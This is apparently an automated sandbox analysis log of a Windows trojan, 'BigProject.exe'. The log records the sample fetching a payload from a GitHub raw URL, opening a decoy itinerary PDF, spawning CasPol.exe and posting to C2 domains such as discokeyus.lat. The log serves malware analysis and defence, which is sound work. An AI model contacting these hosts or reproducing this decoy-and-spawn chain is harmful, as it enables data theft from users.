Source: global traffic HTTP traffic detected:
    GET /AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiion HTTP/1.1
    Accept: */*
    User-Agent: Chrome/95.0.4638.54
    Host: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: stem-mellows.cyou
Source: global traffic DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic DNS traffic detected: DNS query: discokeyus.lat
Source: global traffic DNS traffic detected: DNS query: x1.i.lencr.org
Source: unknown HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: discokeyus.lat
Source: 77EC63BDA74BD0D0E0426DC8F80085060.3.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 2D85F72862B55C4EADD9E66E06947F3D0.3.dr String found in binary or memory: http://x1.i.lencr.org/
Source: CasPol.exe, 00000007.00000002.2452004141.0000000003440000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: CasPol.exe, 00000007.00000002.2452004141.0000000003440000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.999
Source: CasPol.exe, 00000007.00000002.2451042718.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.2452106893.0000000003442000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discokeyus.lat/
Source: CasPol.exe, 00000007.00000002.2450746382.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.2450746382.0000000000D28000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.2451042718.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discokeyus.lat/api
Source: CasPol.exe, 00000007.00000002.2451042718.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discokeyus.lat/apis
Source: CasPol.exe, 00000007.00000002.2452106893.0000000003442000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discokeyus.lat/cYU5
Source: CasPol.exe, 00000007.00000002.2451042718.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discokeyus.lat/v
Source: BigProject.exe, 00000000.00000002.2453321140.0000000001183000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/
Source: BigProject.exe, 00000000.00000002.2453321140.0000000001130000.00000004.00000020.00020000.00000000.sdmp, BigProject.exe, 00000000.00000002.2453321140.000000000113E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/NavanItinerary.pdf
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiion
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiion8Nzk
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiionC
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiionD
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiionw
Source: BigProject.exe, 00000000.00000002.2453321140.0000000001183000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/Q
Source: CasPol.exe, 00000007.00000002.2452004141.0000000003440000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49773 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, 7_2_004329C0
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00CA4EB1 0_2_00CA4EB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00408850 7_2_00408850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00423860 7_2_00423860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004218A0 7_2_004218A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0042DA53 7_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043ECA0 7_2_0043ECA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00437DF0 7_2_00437DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00409580 7_2_00409580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004266D0 7_2_004266D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043F720 7_2_0043F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00415799 7_2_00415799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00438810 7_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041682D 7_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004288CB 7_2_004288CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043D880 7_2_0043D880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00430940 7_2_00430940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00403970 7_2_00403970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00420939 7_2_00420939
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004179C1 7_2_004179C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004231C2 7_2_004231C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004241C0 7_2_004241C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043B1D0 7_2_0043B1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004291DD 7_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043D980 7_2_0043D980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00405990 7_2_00405990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00422190 7_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043D997 7_2_0043D997
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043D999 7_2_0043D999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004091B0 7_2_004091B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0042CA49 7_2_0042CA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00416263 7_2_00416263
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0040EA10 7_2_0040EA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00415220 7_2_00415220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0042CAD0 7_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004252DD 7_2_004252DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041B2E0 7_2_0041B2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00406280 7_2_00406280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043DA80 7_2_0043DA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041E290 7_2_0041E290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041CB40 7_2_0041CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043D34D 7_2_0043D34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00426B50 7_2_00426B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043DB60 7_2_0043DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00436B08 7_2_00436B08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0042830D 7_2_0042830D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0042CB11 7_2_0042CB11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00404320 7_2_00404320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0042CB22 7_2_0042CB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00425327 7_2_00425327
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00408330 7_2_00408330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043F330 7_2_0043F330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0042A33F 7_2_0042A33F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0040DBD9 7_2_0040DBD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00424380 7_2_00424380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041FC75 7_2_0041FC75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041DC00 7_2_0041DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00429C2B 7_2_00429C2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004291DD 7_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004074F0 7_2_004074F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0040ACF0 7_2_0040ACF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041148F 7_2_0041148F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0042AC90 7_2_0042AC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0040CD46 7_2_0040CD46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00437500 7_2_00437500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00422510 7_2_00422510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00417DEE 7_2_00417DEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041759F 7_2_0041759F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00425E70 7_2_00425E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00436E74 7_2_00436E74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00427603 7_2_00427603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00425E30 7_2_00425E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004286C0 7_2_004286C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043AEC0 7_2_0043AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004236E2 7_2_004236E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00405EE0 7_2_00405EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041DE80 7_2_0041DE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00402F50 7_2_00402F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00420F50 7_2_00420F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00438F59 7_2_00438F59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00406710 7_2_00406710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00423F20 7_2_00423F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00419F30 7_2_00419F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041E7C0 7_2_0041E7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004197C2 7_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0042DFE9 7_2_0042DFE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0040A780 7_2_0040A780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00411F90 7_2_00411F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00418792 7_2_00418792
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043EFB0 7_2_0043EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00408030 appears 44 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00414400 appears 65 times
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAcrobat.exe< vs BigProject.exe
Source: BigProject.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/46@7/2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00437DF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW, 7_2_00437DF0
Source: C:\Users\user\Desktop\BigProject.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\NavanItinerary[1].pdf Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe File created: C:\Users\user\AppData\Local\Temp\NavanItinerary.pdf Jump to behavior
Source: BigProject.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\BigProject.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: BigProject.exe Virustotal: Detection: 15%
Source: BigProject.exe ReversingLabs: Detection: 15%
Source: unknown Process created: C:\Users\user\Desktop\BigProject.exe "C:\Users\user\Desktop\BigProject.exe"
Source: C:\Users\user\Desktop\BigProject.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\NavanItinerary.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1508,i,10346652073434978683,7564369482762319465,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Users\user\Desktop\BigProject.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\Desktop\BigProject.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\NavanItinerary.pdf" Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1508,i,10346652073434978683,7564369482762319465,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: fwpuclnt.dll Jump to behavior
